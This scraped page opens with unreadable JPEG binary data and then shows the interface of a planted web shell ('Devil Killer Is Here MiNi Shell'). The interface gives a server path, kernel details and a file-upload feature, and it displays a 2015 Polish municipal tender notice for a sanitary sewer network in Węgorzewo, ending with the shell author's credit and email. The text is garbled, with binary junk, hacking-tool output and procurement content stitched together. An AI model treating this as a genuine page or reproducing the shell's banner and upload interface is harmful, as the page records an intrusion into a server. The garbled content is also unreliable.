JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150319/38429-N-2015.html

<p class="kh_header"><b>Węgorzewo: Budowa sieci kanalizacji sanitarnej przy ul. Milenijnej i Spacerowej w Kolonii Rybackiej.</b><br>
<b>Numer ogłoszenia: 38429 - 2015; data zamieszczenia: 19.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgorzewo , ul. Zamkowa 3, 11-600 Węgorzewo, woj. warmińsko-mazurskie, tel. 87 4275400, faks 87 4275401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegorzewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej przy ul. Milenijnej i Spacerowej w Kolonii Rybackiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa sieci kanalizacji sanitarnej przy ul. Milenijnej i Spacerowej w Kolonii Rybackiej. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na wykonaniu sieci kanalizacji sanitarnej wraz z przepompownią przy ulicy Milenijnej i Spacerowej w Kolonii Rybackiej obręb 13 Ogonki na działkach nr ewid. 367, 391, 392/1  poprzez:  
1)Wykonanie sieci kanalizacji sanitarnej, która obejmuje : 
   a) sieć grawitacyjną z rur PCV fi 200 mm o długości ok. L = 585,00 m, 
   b) sieć grawitacyjną z rur PCV fi 160 mm o długości L =  ok. 208,50 m, 
   c) sieć tłoczna z rur PE - HD fi 90 mm o długości ok. L = 289,00 m,
   d) studzienki kanalizacyjne z tworzyw sztucznych o śr. 1000 mm - szt. 23
2) Wykonanie przepompowni ścieków w kręgach z polimerobetonu fi 1500 mm - szt.1
3) Odtworzenie nawierzchni utwardzonych i nieutwardzonych, przywrócenie do stanu pierwotnego. Nawierzchnia odtworzona mieszanką kruszywa przekruszonego lub naturalne przesiane o frakcji 0-31,50mm. Zawartość domieszek gliniastych i frakcji 0-5 mm nie może przekraczać 15%
4)Pełną obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej. 
Zamówienie należy wykonać zgodnie z dokumentacją przetargową w oparciu o Projekt Budowlany,(zał. Nr 4), STWiOR (zał. nr 5 do SIWZ), Przedmiar robót( zał. Nr 6- materiał pomocniczy).
2. SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA. 
2.1 Szczegółowy opis przedmiotu zamówienia stanowią załączniki : 
-  Załącznik Nr 4 do SIWZ  -   Projekt Budowlany  
-  Załącznik Nr 5 do SIWZ   -  Specyfikacje Techniczne Wykonania i Odbioru Robót 
-  Załącznik Nr 6 do SIWZ   -  Przedmiar robót ( materiał pomocniczy)  
UWAGA: Załączone przedmiary robót, są materiałem pomocniczym do wyliczenia ceny   ryczałtowej oferty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające do wysokości 50% wartości zamówienia podstawowego netto - art. 67 ust.1 pkt 6.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.23.11.10-9, 45.23.24.23-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 8 000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie 
          z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez 
          wykonawcę w celu potwierdzenia warunków udziału w postępowaniu z uwzględnieniem 
          przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem
          Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na
           podstawie art. 89 ust. 1 pkt 5 ustawy. Zamawiający uzna spełnienie powyższego warunku,
            jeżeli wykonawcy wykażą, że w okresie ostatnich 5 lat przed upływem terminu składania ofert 
           albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia jest 
           krótszy - w tym okresie wykonał minimum 1 zamówienie na roboty budowlane w zakresie budowy 
           sieci kanalizacji sanitarnej z przepompownią o wartości nie mniejszej niż 300 tys.zł. brutto, lub
           sieci kanalizacji deszczowej z przepompownią o wartości nie mniejszej niż 300 tys. zł. brutto, lub
          sieci kanalizacji sanitarnej i deszczowej z przepompownią o wartości nie mniejszej niż 300 tys. zł. 
          brutto poparte dokumentem potwierdzającym, że roboty zostały wykonane w sposób należyty oraz 
          wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
          ukończone wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia 
          i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu
          z uwzględnieniem przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie 
          wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem 
          oferty na podstawie art.89 ust.1 pkt 5 ustawy. Warunek ten będzie spełniony przez Wykonawcę,
      jeżeli wykaże on, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
           osoby odpowiedzialne za kierowanie robotami budowlanymi posiadają kwalifikacje zawodowe
           zgodnie z wymogami przepisów ustawy z dnia 7 lipca 1994r.- Prawo Budowlane/Dz.U. z 2006
           Nr 156, poz.118 z późn. zm./ niezbędne do wykonania zamówienia, z uprawnieniami 
            budowlanymi do pełnienia samodzielnej funkcji kierowniczej w specjalności sieci wodociągowe
            i sanitarne oraz przedłożą informacje na temat ich kwalifikacji zawodowych, doświadczenia 
            i wykształcenia, a także zakresu wykonywanych przez nich czynności oraz informację 
            o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty
      złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu 
      uwzględnieniem przepisów art. 26 ust.3 ustawy Pzp. Zamawiający uzna spełnienie powyższego 
      warunku, jeżeli wykonawcy wykażą że posiadają opłaconą polisę, a w przypadku jej braku inny 
      dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w 
      zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 
      200 000 zł. brutto. Wykonawcy mogą polegać na zdolnościach finansowych innych podmiotów 
      niezależnie od charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz oferty, 
    b) Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy,
        polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.  2b ustawy, 
        zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w 
        stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący 
        wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać: 
        1) w przypadku warunków, o których mowa w art. 22 ust. 1 pkt 4 ustawy - dokumentów, o których
           mowa w pkt 4.1. lit. c ogłoszenia, a także innych dokumentów, dotyczących sytuacji ekonomicznej 
            i  finansowej, określonych w ogłoszeniu o zamówieniu lub w SIWZ, 
        2) dokumentów dotyczących  w szczególności: 
            a)  zakresu dostępnych wykonawcy zasobów innego podmiotu,
            b)  sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu
                 zamówienia,
            c)  charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
            d)  zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji jakości - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje wprowadzenie następujących zmian w umowie: 
    1) Terminy dokonania poszczególnych czynności wskazanych w umowie mogą być zmienione w
        następujących sytuacjach :
       a) w przypadku opóźnienia w rozpoczęciu lub realizacji robót budowlanych lub dostaw, odbiorach
          robót, uzyskaniu pozwolenia na użytkowanie, rozliczeniu inwestycji - o ile opóźnienie nie wynika 
         z przyczyn leżących po stronie Wykonawcy,
       b) w przypadku wydłużenia robót z przyczyn niezależnych od Wykonawcy, 
       c) w przypadku wystąpienia robót dodatkowych niezbędnych do wykonania inwestycji, których
           realizacja wymaga zmiany terminu wykonania inwestycji -  o czas ich realizacji,
       d) w przypadku zmian w dokumentacji projektowej mających wpływ na termin wykonania
           inwestycji, 
       e) w razie zakłócenia toku robót budowlanych przez protesty społeczne i ingerencje osób trzecich
           oraz wstrzymanie budowy przez organ nadzoru budowlanego i inne organy nadzoru, ale tylko 
           po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
      f) jeżeli w otoczeniu budowy rozpoczęto realizację robót, które uniemożliwiają dostęp do placu
        budowy lub z przyczyn praktycznych, roboty w otoczeniu placu budowy powinny być wykonane
       wcześniej.
     g) w razie braku możliwości wykonania zamówienia zgodnie z dostarczoną dokumentacją 
         i przekazanym placem budowy, 
     h) w przypadku wystąpienia siły wyższej - zmiana wymaga zgody obu stron. Przez siłę wyższą 
         rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które
         zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, 
         których strony nie mogły wcześniej przewidzieć i którym nie mogły przeciwdziałać poprzez 
         działanie z należytą starannością ogólnie przewidziana dla cywilnoprawnych stosunków 
         zobowiązaniowych.
4) Podstawą ustalenia nowego terminu będzie ilość dni powodująca wstrzymanie wykonywanie robót.
5) Wszelkie zmiany i uzupełnienia treści niniejszej umowy, a w szczególności zmiana zakresu robót wymagają pod rygorem nieważności zgody obu stron  wyrażonej na piśmie w formie aneksu.
6) Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzenia nowych postanowień do umowy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem :
1)	sytuacji wymienionych w  ust. 3
2)	dokonania zmian w projekcie budowlanym,
3)	zmiany ceny, gdy:
a)	nastąpi urzędowa zmiana stawki podatku VAT,
b)	wystąpi różnica między obmiarem projektowym a obmiarem powykonawczym,
            c) Zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub materiały.
   - podstawą ustalenia nowej ceny będą niezmienione ceny, stawki i narzuty z kosztorysu ofertowego.
       4) podwykonawstwa - za uprzednią zgodą Zamawiającego :
a) powierzenia podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
b) powierzenia podwykonawcom części robót, mimo oświadczenia o samodzielnej realizacji
    zamówienia złożonego przez Wykonawcę w ofercie,
    5) pozostałym, w szczególności :
a) w przypadku zastosowania materiałów i technologii innych niż określone w umowie, pod
   warunkiem, że ich parametry techniczne i jakościowe nie będą gorsze niż wskazane w umowie
    - zmiana wymaga zgody obu stron,
b) zmian korzystnych dla Zamawiającego w szczególności obniżenia kosztów realizacji robót lub
    podwyższenie standardu realizowanej roboty,
c) nieprzewidywalnym na etapie wszczęcia postępowania, którego wprowadzenie jest niezbędne  do  realizacji zamówienia,
d) zmiany formy organizacyjno prawnej, przekształcenia lub połączenia wykonawców,
e) doprecyzowania zapisów umowy
7)  Warunki zmian :
    1) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
    2) uzasadnienie zmian - w szczególności: prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
    3) forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.
8) Zamawiający nie przedłuży terminu wykonania umowy, jeżeli zmiana będzie wymuszona uchybieniem (np. zbyt późne złożenie odpowiedniego wniosku) lub naruszeniem umowy przez Wykonawcę.
            a)	opóźnienia przekazania w ustalonych terminach placu budowy przez Zamawiającego,
b)	zlecenia robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres mają wpływ na pierwotny termin umowy,
c)	przerwy w realizacji robót powstałych na skutek przyczyn niezależnych od Wykonawcy i Zamawiającego np. awarie instalacji wewnątrz budynku, długotrwały brak dostawy prądu.
	d)	wstrzymania prac przez Zamawiającego albo przerw w wykonaniu prac powstałych z winy Zamawiającego a spowodowanych okolicznościami, których nie mógł przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie i realizację usługi.
2.	Dopuszcza się możliwość zmiany postanowień niniejszej umowy w przypadku:
a)	dokładniejszego doprecyzowania zapisów umowy,
b)	wprowadzenia zmian korzystnych dla Zamawiającego, w szczególności obniżenia 
kosztów zadania lub podniesienia standardu wykonywanego zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegorzewo.pl; http://gmina.wegorzewo.sisco.info/?przetargi=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Węgorzewie, ul. Zamkowa 3, 11 - 600 Węgorzewo, w godzinach pracy tj. poniedziałek - piątek 8:00 - 15:00, a także złożyć wniosek o jej przesłanie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2015 godzina 11:00, miejsce: Urząd Miejski w Węgorzewie ul. Zamkowa 3, 11- 600 Węgorzewo /sekretariat - I piętro/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com